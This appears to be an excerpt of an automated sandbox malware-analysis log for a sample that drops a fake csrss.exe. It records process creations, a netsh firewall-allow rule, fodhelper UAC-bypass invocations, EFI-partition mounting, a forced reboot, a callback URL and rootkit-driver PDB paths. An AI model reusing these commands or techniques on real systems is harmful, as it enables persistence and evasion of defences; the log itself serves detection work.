            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"Jump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'emptysmoke.exe'
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrssJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_01
            Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7116:64:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: 1dyvctHqv1.exeString found in binary or memory: application/app/install.go
            Source: 1dyvctHqv1.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: 1dyvctHqv1.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: 1dyvctHqv1.exeString found in binary or memory: application/app/install.go
            Source: 1dyvctHqv1.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: 1dyvctHqv1.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: 1dyvctHqv1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: 1dyvctHqv1.exeStatic file information: File size 4534824 > 1048576
            Source: 1dyvctHqv1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x438e00
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 1dyvctHqv1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Loader.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: csrss.exe
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.334492688.0000000006803000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000021.00000003.364615971.0000000006803000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
